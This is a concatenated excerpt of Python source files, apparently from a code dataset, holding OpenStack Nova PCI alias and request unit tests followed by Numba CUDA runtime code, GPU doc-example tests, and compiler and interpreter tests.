"capability_type": "pci",
"product_id": "4443",
"vendor_id": "8086",
"dev_type": "type-PCI"
}, {
"capability_type": "pci",
"product_id": "4444",
"vendor_id": "8086",
"dev_type": "type-PCI"
}])
self.assertEqual(expected_result, result['QuickAssist'])
def _test_get_alias_from_config_invalid(self, alias):
self.flags(alias=[alias], group='pci')
self.assertRaises(
exception.PciInvalidAlias,
request._get_alias_from_config)
def test_get_alias_from_config_invalid_device_type(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"device_type": "N",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_device_type_vdpa(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"device_type": "vdpa",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_product_id(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"product_id": "g111",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_vendor_id(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"vendor_id": "0xg111",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_capability_type(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"capability_type": "usb",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_numa_policy(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"numa_policy": "derp",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_invalid_arbitrary_field(self):
fake_alias = jsonutils.dumps({
"name": "xxx",
"foo": "bar",
})
self._test_get_alias_from_config_invalid(fake_alias)
def test_get_alias_from_config_valid_numa_policy(self):
for policy in fields.PCINUMAAffinityPolicy.ALL:
fake_alias = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PCI",
"numa_policy": policy,
})
self.flags(alias=[fake_alias], group='pci')
aliases = request._get_alias_from_config()
self.assertIsNotNone(aliases)
self.assertIn("xxx", aliases)
self.assertEqual(policy, aliases["xxx"][0])
def test_get_alias_from_config_conflicting_device_type(self):
"""Check behavior when device_type conflicts occur."""
fake_alias_a = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PF"
})
fake_alias_b = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"device_type": "type-PCI"
})
self.flags(alias=[fake_alias_a, fake_alias_b], group='pci')
self.assertRaises(
exception.PciInvalidAlias,
request._get_alias_from_config)
def test_get_alias_from_config_conflicting_numa_policy(self):
"""Check behavior when numa_policy conflicts occur."""
fake_alias_a = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"numa_policy": "required",
})
fake_alias_b = jsonutils.dumps({
"name": "xxx",
"capability_type": "pci",
"product_id": "1111",
"vendor_id": "8086",
"numa_policy": "legacy",
})
self.flags(alias=[fake_alias_a, fake_alias_b], group='pci')
self.assertRaises(
exception.PciInvalidAlias,
request._get_alias_from_config)
def _verify_result(self, expected, real):
exp_real = zip(expected, real)
for exp, real in exp_real:
self.assertEqual(exp['count'], real.count)
self.assertEqual(exp['alias_name'], real.alias_name)
self.assertEqual(exp['spec'], real.spec)
def test_translate_alias_to_requests(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
expect_request = [
{'count': 3,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '4443',
'dev_type': 'type-PCI',
'capability_type': 'pci'}],
'alias_name': 'QuickAssist'},
{'count': 1,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC'}, ]
requests = request._translate_alias_to_requests(
"QuickAssist : 3, IntelNIC: 1")
self.assertEqual(set([p.count for p in requests]), set([1, 3]))
self._verify_result(expect_request, requests)
def test_translate_alias_to_requests_invalid(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
self.assertRaises(exception.PciRequestAliasNotDefined,
request._translate_alias_to_requests,
"QuickAssistX : 3")
def test_translate_alias_to_requests_affinity_policy(self):
# _fake_alias1 requests the legacy policy and _fake_alias2
# has no numa_policy set so it will default to legacy.
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
        # So, to test that the flavor/image policy takes precedence,
        # use the preferred policy.
policy = fields.PCINUMAAffinityPolicy.PREFERRED
expect_request = [
{'count': 3,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '4443',
'dev_type': 'type-PCI',
'capability_type': 'pci'}],
'alias_name': 'QuickAssist',
'numa_policy': policy
},
{'count': 1,
'requester_id': None,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC',
'numa_policy': policy
}, ]
requests = request._translate_alias_to_requests(
"QuickAssist : 3, IntelNIC: 1", affinity_policy=policy)
self.assertEqual(set([p.count for p in requests]), set([1, 3]))
self._verify_result(expect_request, requests)
@mock.patch.object(objects.compute_node.ComputeNode,
'get_by_host_and_nodename')
def test_get_instance_pci_request_from_vif_invalid(
self,
cn_get_by_host_and_node):
# Basically make sure we raise an exception if an instance
        # has an allocated PCI device without having its corresponding
# PCIRequest object in instance.pci_requests
mock_inst_cn = mock.Mock()
mock_inst_cn.id = 1
cn_get_by_host_and_node.return_value = mock_inst_cn
# Create a fake instance with PCI request and allocated PCI devices
pci_dev1 = objects.PciDevice(request_id=uuidsentinel.pci_req_id1,
address='0000:04:00.0',
compute_node_id=1)
pci_req2 = objects.InstancePCIRequest(
request_id=uuidsentinel.pci_req_id2)
pci_dev2 = objects.PciDevice(request_id=uuidsentinel.pci_req_id2,
address='0000:05:00.0',
compute_node_id=1)
pci_request_list = [pci_req2]
pci_device_list = [pci_dev1, pci_dev2]
inst = PciRequestTestCase._create_fake_inst_with_pci_devs(
pci_request_list,
pci_device_list)
# Create a VIF with pci_dev1 that has no corresponding PCI request
pci_vif = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT,
profile={'pci_slot': '0000:04:00.0'})
self.assertRaises(exception.PciRequestFromVIFNotFound,
request.get_instance_pci_request_from_vif,
self.context,
inst,
pci_vif)
@mock.patch.object(objects.compute_node.ComputeNode,
'get_by_host_and_nodename')
def test_get_instance_pci_request_from_vif(self, cn_get_by_host_and_node):
mock_inst_cn = mock.Mock()
mock_inst_cn.id = 1
cn_get_by_host_and_node.return_value = mock_inst_cn
# Create a fake instance with PCI request and allocated PCI devices
pci_req1 = objects.InstancePCIRequest(
request_id=uuidsentinel.pci_req_id1)
pci_dev1 = objects.PciDevice(request_id=uuidsentinel.pci_req_id1,
address='0000:04:00.0',
compute_node_id = 1)
pci_req2 = objects.InstancePCIRequest(
request_id=uuidsentinel.pci_req_id2)
pci_dev2 = objects.PciDevice(request_id=uuidsentinel.pci_req_id2,
address='0000:05:00.0',
compute_node_id=1)
pci_request_list = [pci_req1, pci_req2]
pci_device_list = [pci_dev1, pci_dev2]
inst = PciRequestTestCase._create_fake_inst_with_pci_devs(
pci_request_list,
pci_device_list)
# Create a vif with normal port and make sure no PCI request returned
normal_vif = model.VIF(vnic_type=model.VNIC_TYPE_NORMAL)
self.assertIsNone(request.get_instance_pci_request_from_vif(
self.context,
inst,
normal_vif))
# Create a vif with PCI address under profile, make sure the correct
# PCI request is returned
pci_vif = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT,
profile={'pci_slot': '0000:05:00.0'})
self.assertEqual(uuidsentinel.pci_req_id2,
request.get_instance_pci_request_from_vif(
self.context,
inst,
pci_vif).request_id)
# Create a vif with PCI under profile which is not claimed
# for the instance, i.e no matching pci device in instance.pci_devices
nonclaimed_pci_vif = model.VIF(vnic_type=model.VNIC_TYPE_DIRECT,
profile={'pci_slot': '0000:08:00.0'})
self.assertIsNone(request.get_instance_pci_request_from_vif(
self.context,
inst,
nonclaimed_pci_vif))
# "Move" the instance to another compute node, make sure that no
# matching PCI request against the new compute.
mock_inst_cn.id = 2
self.assertIsNone(request.get_instance_pci_request_from_vif(
self.context,
inst,
pci_vif))
def test_get_pci_requests_from_flavor(self):
self.flags(alias=[_fake_alias1], group='pci')
expect_request = [
{
'count': 3,
'spec': [
{
'vendor_id': '8086',
'product_id': '4443',
'dev_type': "type-PCI",
'capability_type': 'pci',
}
],
'alias_name': 'QuickAssist'
},
]
flavor = {'extra_specs': {'pci_passthrough:alias': 'QuickAssist:3'}}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual(1, len(requests.requests))
self.assertEqual({3, }, {p.count for p in requests.requests})
self._verify_result(expect_request, requests.requests)
def test_get_pci_requests_from_flavor_multiple(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
expect_request = [
{'count': 3,
'spec': [{'vendor_id': '8086', 'product_id': '4443',
'dev_type': "type-PCI",
'capability_type': 'pci'}],
'alias_name': 'QuickAssist'},
{'count': 1,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC'}, ]
flavor = {'extra_specs': {"pci_passthrough:alias":
"QuickAssist:3, IntelNIC: 1"}}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual(2, len(requests.requests))
self.assertEqual({3, 1}, {p.count for p in requests.requests})
self._verify_result(expect_request, requests.requests)
def test_get_pci_requests_from_flavor_including_space(self):
_fake_alias4 = jsonutils.dumps({
"name": " Cirrus Logic ",
"capability_type": "pci",
"product_id": "0ff2",
"vendor_id": "10de",
"device_type": "type-PCI",
})
self.flags(alias=[_fake_alias2, _fake_alias4], group='pci')
expect_request = [
{'count': 4,
'spec': [{'vendor_id': '10de', 'product_id': '0ff2',
'dev_type': "type-PCI",
'capability_type': 'pci'}],
'alias_name': 'Cirrus Logic'},
{'count': 3,
'spec': [{'vendor_id': '8086', 'product_id': '1111',
'dev_type': "type-PF",
'capability_type': 'pci'}],
'alias_name': 'IntelNIC'}, ]
flavor = {'extra_specs': {"pci_passthrough:alias":
" Cirrus Logic : 4, IntelNIC: 3"}}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual(2, len(requests.requests))
self.assertEqual({3, 4}, {p.count for p in requests.requests})
self._verify_result(expect_request, requests.requests)
def test_get_pci_requests_from_flavor_no_extra_spec(self):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
flavor = {}
requests = request.get_pci_requests_from_flavor(flavor)
self.assertEqual([], requests.requests)
@mock.patch.object(
request, "_translate_alias_to_requests", return_value=[])
def test_get_pci_requests_from_flavor_affinity_policy(
self, mock_translate):
self.flags(alias=[_fake_alias1, _fake_alias2], group='pci')
flavor = {'extra_specs': {"pci_passthrough:alias":
"QuickAssist:3, IntelNIC: 1"}}
policy = fields.PCINUMAAffinityPolicy.PREFERRED
request.get_pci_requests_from_flavor(flavor, affinity_policy=policy)
mock_translate.assert_called_with(mock.ANY, affinity_policy=policy)
``` |
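As `test_get_pci_requests_from_flavor_including_space` above shows, the `pci_passthrough:alias` extra spec is a comma-separated list of `name:count` pairs with whitespace tolerated around both parts. A rough sketch of that parsing with a hypothetical `parse_alias_spec` helper (Nova's real implementation lives in `request._translate_alias_to_requests` and also resolves each name against the configured aliases):
```python
# Hypothetical parser for "QuickAssist : 3, IntelNIC: 1"-style extra specs.
def parse_alias_spec(spec):
    requests = []
    for item in spec.split(','):
        name, _, count = item.rpartition(':')
        requests.append((name.strip(), int(count)))
    return requests

assert parse_alias_spec(" Cirrus Logic : 4, IntelNIC: 3") == [
    ("Cirrus Logic", 4), ("IntelNIC", 3)]
```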
{
"source": "10088/numba",
"score": 2
} |
#### File: cuda/cudadrv/runtime.py
```python
import ctypes
import functools
import sys
from numba.core import config
from numba.cuda.cudadrv.driver import ERROR_MAP, make_logger
from numba.cuda.cudadrv.error import CudaSupportError, CudaRuntimeError
from numba.cuda.cudadrv.libs import open_cudalib
from numba.cuda.cudadrv.rtapi import API_PROTOTYPES
from numba.cuda.cudadrv import enums
class CudaRuntimeAPIError(CudaRuntimeError):
"""
Raised when there is an error accessing a C API from the CUDA Runtime.
"""
def __init__(self, code, msg):
self.code = code
self.msg = msg
super().__init__(code, msg)
def __str__(self):
return "[%s] %s" % (self.code, self.msg)
class Runtime:
"""
Runtime object that lazily binds runtime API functions.
"""
def __init__(self):
self.is_initialized = False
def _initialize(self):
# lazily initialize logger
global _logger
_logger = make_logger()
if config.DISABLE_CUDA:
msg = ("CUDA is disabled due to setting NUMBA_DISABLE_CUDA=1 "
"in the environment, or because CUDA is unsupported on "
"32-bit systems.")
raise CudaSupportError(msg)
self.lib = open_cudalib('cudart')
self.is_initialized = True
def __getattr__(self, fname):
# First request of a runtime API function
try:
proto = API_PROTOTYPES[fname]
except KeyError:
raise AttributeError(fname)
restype = proto[0]
argtypes = proto[1:]
if not self.is_initialized:
self._initialize()
# Find function in runtime library
libfn = self._find_api(fname)
libfn.restype = restype
libfn.argtypes = argtypes
safe_call = self._wrap_api_call(fname, libfn)
setattr(self, fname, safe_call)
return safe_call
def _wrap_api_call(self, fname, libfn):
@functools.wraps(libfn)
def safe_cuda_api_call(*args):
_logger.debug('call runtime api: %s', libfn.__name__)
retcode = libfn(*args)
self._check_error(fname, retcode)
return safe_cuda_api_call
def _check_error(self, fname, retcode):
if retcode != enums.CUDA_SUCCESS:
errname = ERROR_MAP.get(retcode, "cudaErrorUnknown")
msg = "Call to %s results in %s" % (fname, errname)
_logger.error(msg)
raise CudaRuntimeAPIError(retcode, msg)
def _find_api(self, fname):
try:
return getattr(self.lib, fname)
except AttributeError:
pass
# Not found.
        # Delay the missing-function error until the function is used
def absent_function(*args, **kws):
msg = "runtime missing function: %s."
raise CudaRuntimeError(msg % fname)
setattr(self, fname, absent_function)
return absent_function
def get_version(self):
"""
Returns the CUDA Runtime version as a tuple (major, minor).
"""
rtver = ctypes.c_int()
self.cudaRuntimeGetVersion(ctypes.byref(rtver))
# The version is encoded as (1000 * major) + (10 * minor)
major = rtver.value // 1000
minor = (rtver.value - (major * 1000)) // 10
return (major, minor)
def is_supported_version(self):
"""
Returns True if the CUDA Runtime is a supported version.
"""
return self.get_version() in self.supported_versions
@property
def supported_versions(self):
"""A tuple of all supported CUDA toolkit versions. Versions are given in
the form ``(major_version, minor_version)``."""
if sys.platform not in ('linux', 'win32') or config.MACHINE_BITS != 64:
# Only 64-bit Linux and Windows are supported
return ()
return ((9, 2),
(10, 0), (10, 1), (10, 2),
(11, 0), (11, 1), (11, 2))
runtime = Runtime()
def get_version():
"""
Return the runtime version as a tuple of (major, minor)
"""
return runtime.get_version()
```
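As the comment in `get_version` notes, the runtime reports its version as a single integer, `(1000 * major) + (10 * minor)`, so CUDA 11.2 comes back as `11020`. A quick standalone check of the decoding arithmetic:
```python
def decode_cuda_version(encoded):
    # Inverse of (1000 * major) + (10 * minor).
    major = encoded // 1000
    minor = (encoded - major * 1000) // 10
    return (major, minor)

assert decode_cuda_version(11020) == (11, 2)
assert decode_cuda_version(9020) == (9, 2)
```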
#### File: tests/doc_examples/test_laplace.py
```python
import unittest
from numba.cuda.testing import (CUDATestCase, skip_if_cudadevrt_missing,
skip_on_cudasim, skip_unless_cc_60)
from numba.tests.support import captured_stdout
@skip_if_cudadevrt_missing
@skip_unless_cc_60
@skip_on_cudasim("cudasim doesn't support cuda import at non-top-level")
class TestLaplace(CUDATestCase):
"""
Test simple vector addition
"""
def setUp(self):
# Prevent output from this test showing up when running the test suite
self._captured_stdout = captured_stdout()
self._captured_stdout.__enter__()
super().setUp()
def tearDown(self):
# No exception type, value, or traceback
self._captured_stdout.__exit__(None, None, None)
super().tearDown()
def test_ex_laplace(self):
# set True to regenerate the figures that
# accompany this example
plot = False
# ex_laplace.import.begin
import numpy as np
from numba import cuda
# ex_laplace.import.end
# ex_laplace.allocate.begin
# Use an odd problem size.
# This is so there can be an element truly in the "middle" for symmetry.
size = 1001
data = np.zeros(size)
# Middle element is made very hot
data[500] = 10000
buf_0 = cuda.to_device(data)
# This extra array is used for synchronization purposes
buf_1 = cuda.device_array_like(buf_0)
niter = 10000
# ex_laplace.allocate.end
if plot:
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(16 * 0.66, 9 * 0.66))
plt.plot(
np.arange(len(buf_0)),
buf_0.copy_to_host(),
lw=3,
marker="*",
color='black'
)
plt.title('Initial State', fontsize=24)
plt.xlabel('Position', fontsize=24)
plt.ylabel('Temperature', fontsize=24)
ax.set_xticks(ax.get_xticks(), fontsize=16)
ax.set_yticks(ax.get_yticks(), fontsize=16)
plt.xlim(0, len(data))
plt.ylim(0, 10001)
plt.savefig('laplace_initial.svg')
# ex_laplace.kernel.begin
@cuda.jit
def solve_heat_equation(buf_0, buf_1, timesteps, k):
i = cuda.grid(1)
# Don't continue if our index is outside the domain
if i >= len(buf_0):
return
# Prepare to do a grid-wide synchronization later
grid = cuda.cg.this_grid()
for step in range(timesteps):
# Select the buffer from the previous timestep
if (step % 2) == 0:
data = buf_0
next_data = buf_1
else:
data = buf_1
next_data = buf_0
# Get the current temperature associated with this point
curr_temp = data[i]
# Apply formula from finite difference equation
if i == 0:
# Left wall is held at T = 0
next_temp = curr_temp + k * (data[i + 1] - (2 * curr_temp))
elif i == len(data) - 1:
# Right wall is held at T = 0
next_temp = curr_temp + k * (data[i - 1] - (2 * curr_temp))
else:
# Interior points are a weighted average of their neighbors
next_temp = curr_temp + k * (
data[i - 1] - (2 * curr_temp) + data[i + 1]
)
# Write new value to the next buffer
next_data[i] = next_temp
# Wait for every thread to write before moving on
grid.sync()
# ex_laplace.kernel.end
# ex_laplace.launch.begin
solve_heat_equation.forall(len(data))(
buf_0, buf_1, niter, 0.25
)
# ex_laplace.launch.end
results = buf_1.copy_to_host()
if plot:
fig, ax = plt.subplots(figsize=(16 * 0.66, 9 * 0.66))
plt.plot(
np.arange(len(results)),
results, lw=3,
marker="*",
color='black'
)
plt.title(f"T = {niter}", fontsize=24)
plt.xlabel('Position', fontsize=24)
plt.ylabel('Temperature', fontsize=24)
ax.set_xticks(ax.get_xticks(), fontsize=16)
ax.set_yticks(ax.get_yticks(), fontsize=16)
plt.ylim(0, max(results))
plt.xlim(0, len(results))
plt.savefig('laplace_final.svg')
# Integral over the domain should be equal to its initial value.
# Note that this should match the initial value of data[500] above, but
# we don't assign it to a variable because that would make the example
# code look a bit oddly verbose.
np.testing.assert_allclose(results.sum(), 10000)
if __name__ == "__main__":
unittest.main()
```
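The kernel above is a standard explicit finite-difference update for the 1D heat equation with both walls held at T = 0: two buffers are swapped each timestep, and the grid-wide sync guarantees every thread reads a consistent previous state before any thread writes the next one. As an independent cross-check (not part of the original example), the same stencil is a few lines of NumPy:
```python
import numpy as np

def solve_heat_equation_cpu(data, timesteps, k):
    # Same update as the CUDA kernel: explicit Euler on u_t = k * u_xx,
    # with the out-of-bounds neighbors implicitly held at 0.
    buf = data.astype(np.float64).copy()
    for _ in range(timesteps):
        nxt = buf.copy()
        nxt[1:-1] = buf[1:-1] + k * (buf[:-2] - 2 * buf[1:-1] + buf[2:])
        nxt[0] = buf[0] + k * (buf[1] - 2 * buf[0])      # left wall at T = 0
        nxt[-1] = buf[-1] + k * (buf[-2] - 2 * buf[-1])  # right wall at T = 0
        buf = nxt
    return buf

data = np.zeros(1001)
data[500] = 10000
result = solve_heat_equation_cpu(data, 100, 0.25)
# Heat has not reached the walls after 100 steps, so the sum is conserved.
np.testing.assert_allclose(result.sum(), 10000)
```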
#### File: tests/doc_examples/test_montecarlo.py
```python
import unittest
from numba.cuda.testing import CUDATestCase, skip_on_cudasim
from numba.tests.support import captured_stdout
@skip_on_cudasim("cudasim doesn't support cuda import at non-top-level")
class TestMonteCarlo(CUDATestCase):
"""
Test monte-carlo integration
"""
def setUp(self):
# Prevent output from this test showing up when running the test suite
self._captured_stdout = captured_stdout()
self._captured_stdout.__enter__()
super().setUp()
def tearDown(self):
# No exception type, value, or traceback
self._captured_stdout.__exit__(None, None, None)
super().tearDown()
def test_ex_montecarlo(self):
# ex_montecarlo.import.begin
import numba
import numpy as np
from numba import cuda
from numba.cuda.random import (
create_xoroshiro128p_states,
xoroshiro128p_uniform_float32,
)
# ex_montecarlo.import.end
# ex_montecarlo.define.begin
        # number of samples; a higher value leads to a more accurate answer
nsamps = 1000000
# ex_montecarlo.define.end
# ex_montecarlo.kernel.begin
@cuda.jit
def mc_integrator_kernel(out, rng_states, lower_lim, upper_lim):
"""
kernel to draw random samples and evaluate the function to
be integrated at those sample values
"""
size = len(out)
gid = cuda.grid(1)
if gid < size:
# draw a sample between 0 and 1 on this thread
samp = xoroshiro128p_uniform_float32(rng_states, gid)
# normalize this sample to the limit range
samp = samp * (upper_lim - lower_lim) + lower_lim
# evaluate the function to be
# integrated at the normalized
# value of the sample
y = func(samp)
out[gid] = y
# ex_montecarlo.kernel.end
# ex_montecarlo.callfunc.begin
@cuda.reduce
def sum_reduce(a, b):
return a + b
def mc_integrate(lower_lim, upper_lim, nsamps):
"""
approximate the definite integral of `func` from
`lower_lim` to `upper_lim`
"""
out = cuda.to_device(np.zeros(nsamps, dtype="float32"))
rng_states = create_xoroshiro128p_states(nsamps, seed=42)
            # launch the kernel to evaluate the integrand at each sample
mc_integrator_kernel.forall(nsamps)(
out, rng_states, lower_lim, upper_lim
)
# normalization factor to convert
# to the average: (b - a)/(N - 1)
factor = (upper_lim - lower_lim) / (nsamps - 1)
return sum_reduce(out) * factor
# ex_montecarlo.callfunc.end
# ex_montecarlo.launch.begin
# define a function to integrate
@numba.jit
def func(x):
return 1.0 / x
mc_integrate(1, 2, nsamps) # array(0.6929643, dtype=float32)
mc_integrate(2, 3, nsamps) # array(0.4054021, dtype=float32)
# ex_montecarlo.launch.end
# values computed independently using maple
np.testing.assert_allclose(
mc_integrate(1, 2, nsamps), 0.69315, atol=0.001
)
np.testing.assert_allclose(
mc_integrate(2, 3, nsamps), 0.4055, atol=0.001
)
if __name__ == "__main__":
unittest.main()
```
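The kernel rescales each uniform sample into [a, b] and evaluates the integrand there, and the reduction multiplies the sum by (b - a)/(N - 1); this is the plain Monte Carlo estimate ∫f ≈ (b - a) · mean(f(x_i)), with N - 1 used as the normalizer in the example above. A CPU-only NumPy sketch of the same estimator (using NumPy's RNG instead of xoroshiro128p) for comparison:
```python
import numpy as np

def mc_integrate_cpu(func, lower_lim, upper_lim, nsamps, seed=42):
    # Monte Carlo estimate: (b - a) * mean(f(samples)).
    rng = np.random.default_rng(seed)
    samples = rng.uniform(lower_lim, upper_lim, nsamps)
    return (upper_lim - lower_lim) * func(samples).mean()

est = mc_integrate_cpu(lambda x: 1.0 / x, 1, 2, 1_000_000)
assert abs(est - np.log(2)) < 1e-3  # ln(2) ~= 0.69315
```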
#### File: numba/tests/test_funcdesc.py
```python
import unittest
from numba import njit
from numba.core.funcdesc import PythonFunctionDescriptor, default_mangler
from numba.core.compiler import run_frontend
from numba.core.itanium_mangler import mangle_abi_tag
class TestModule(unittest.TestCase):
def test_module_not_in_namespace(self):
""" Test of trying to run a compiled function
where the module from which the function is being compiled
doesn't exist in the namespace.
"""
filename = 'test.py'
name = 'mypackage'
code = """
def f(x):
return x
"""
objs = dict(__file__=filename, __name__=name)
compiled = compile(code, filename, 'exec')
exec(compiled, objs)
compiled_f = njit(objs['f'])
self.assertEqual(compiled_f(3), 3)
class TestFuncDescMangledName(unittest.TestCase):
def test_mangling_abi_tags(self):
"""
This is a minimal test for the abi-tags support in the mangler.
"""
def udt():
pass
# run minimal frontend to create a function descriptor
func_ir = run_frontend(udt)
typemap = {}
restype = None
calltypes = ()
mangler = default_mangler
inline = False
noalias = False
abi_tags = ("Shrubbery", "Herring")
fd = PythonFunctionDescriptor.from_specialized_function(
func_ir, typemap, restype, calltypes, mangler, inline, noalias,
abi_tags=abi_tags,
)
# mangled tag must exist in the mangled name
self.assertIn("".join([mangle_abi_tag(x) for x in abi_tags]),
fd.mangled_name)
if __name__ == '__main__':
unittest.main()
```
#### File: numba/tests/test_interpreter.py
```python
from numba import njit, objmode
from numba.core.errors import UnsupportedError
from numba.tests.support import TestCase, MemoryLeakMixin, skip_unless_py10
@njit
def sum_jit_func(
arg0=0,
arg1=0,
arg2=0,
arg3=0,
arg4=0,
arg5=0,
arg6=0,
arg7=0,
arg8=0,
arg9=0,
arg10=0,
arg11=0,
arg12=0,
arg13=0,
arg14=0,
arg15=0,
arg16=0,
arg17=0,
arg18=0,
arg19=0,
arg20=0,
arg21=0,
arg22=0,
arg23=0,
arg24=0,
arg25=0,
arg26=0,
arg27=0,
arg28=0,
arg29=0,
arg30=0,
arg31=0,
arg32=0,
arg33=0,
arg34=0,
arg35=0,
arg36=0,
arg37=0,
arg38=0,
arg39=0,
arg40=0,
arg41=0,
arg42=0,
arg43=0,
arg44=0,
arg45=0,
arg46=0,
):
return (
arg0
+ arg1
+ arg2
+ arg3
+ arg4
+ arg5
+ arg6
+ arg7
+ arg8
+ arg9
+ arg10
+ arg11
+ arg12
+ arg13
+ arg14
+ arg15
+ arg16
+ arg17
+ arg18
+ arg19
+ arg20
+ arg21
+ arg22
+ arg23
+ arg24
+ arg25
+ arg26
+ arg27
+ arg28
+ arg29
+ arg30
+ arg31
+ arg32
+ arg33
+ arg34
+ arg35
+ arg36
+ arg37
+ arg38
+ arg39
+ arg40
+ arg41
+ arg42
+ arg43
+ arg44
+ arg45
+ arg46
)
class TestCallFunctionExPeepHole(TestCase, MemoryLeakMixin):
"""
gh #7812
Tests that check a peephole optimization for Function calls
in Python 3.10. The bytecode changes when
(n_args / 2) + n_kws > 15, which moves the arguments from
the stack into a tuple and dictionary.
This peephole optimization updates the IR to use the original format.
There are different paths when n_args > 30 and n_args <= 30 and when
n_kws > 15 and n_kws <= 15.
"""
THRESHOLD_ARGS = 31
THRESHOLD_KWS = 16
def gen_func(self, n_args, n_kws):
"""
Generates a function that calls sum_jit_func
with the desired number of args and kws.
"""
param_list = [f"arg{i}" for i in range(n_args + n_kws)]
args_list = []
for i in range(n_args + n_kws):
# Call a function on every 5th argument to ensure
# we test function calls.
if i % 5 == 0:
arg_val = f"pow(arg{i}, 2)"
else:
arg_val = f"arg{i}"
args_list.append(arg_val)
total_params = ", ".join(param_list)
func_text = f"def impl({total_params}):\n"
func_text += " return sum_jit_func(\n"
for i in range(n_args):
func_text += f" {args_list[i]},\n"
for i in range(n_args, n_args + n_kws):
func_text += f" {param_list[i]}={args_list[i]},\n"
func_text += " )\n"
local_vars = {}
exec(func_text, {"sum_jit_func": sum_jit_func}, local_vars)
return local_vars["impl"]
@skip_unless_py10
def test_all_args(self):
"""
Tests calling a function when n_args > 30 and
n_kws = 0. This shouldn't use the peephole, but
it should still succeed.
"""
total_args = [i for i in range(self.THRESHOLD_ARGS)]
f = self.gen_func(self.THRESHOLD_ARGS, 0)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_all_kws(self):
"""
Tests calling a function when n_kws > 15 and
n_args = 0.
"""
total_args = [i for i in range(self.THRESHOLD_KWS)]
f = self.gen_func(0, self.THRESHOLD_KWS)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_small_args_small_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args <= 30 and n_kws <= 15
"""
used_args = self.THRESHOLD_ARGS - 1
used_kws = self.THRESHOLD_KWS - 1
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_small_args_large_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args <= 30 and n_kws > 15
"""
used_args = self.THRESHOLD_ARGS - 1
used_kws = self.THRESHOLD_KWS
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_args_small_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args > 30 and n_kws <= 15
"""
used_args = self.THRESHOLD_ARGS
used_kws = self.THRESHOLD_KWS - 1
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_args_large_kws(self):
"""
Tests calling a function when (n_args / 2) + n_kws > 15,
but n_args > 30 and n_kws > 15
"""
used_args = self.THRESHOLD_ARGS
used_kws = self.THRESHOLD_KWS
total_args = [i for i in range((used_args) + (used_kws))]
f = self.gen_func(used_args, used_kws)
py_func = f
cfunc = njit()(f)
a = py_func(*total_args)
b = cfunc(*total_args)
self.assertEqual(a, b)
@skip_unless_py10
def test_large_kws_objmode(self):
"""
Tests calling an objectmode function with > 15 return values.
"""
def py_func():
return (
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
)
@njit
def objmode_func():
"""
Wrapper to call py_func from objmode. This tests
large kws with objmode. If the definition for the
call is not properly updated this test will fail.
"""
with objmode(
a='int64',
b='int64',
c='int64',
d='int64',
e='int64',
f='int64',
g='int64',
h='int64',
i='int64',
j='int64',
k='int64',
l='int64',
m='int64',
n='int64',
o='int64',
p='int64',
):
(
a,
b,
c,
d,
e,
f,
g,
h,
i,
j,
k,
l,
m,
n,
o,
p
) = py_func()
return (
a
+ b
+ c
+ d
+ e
+ f
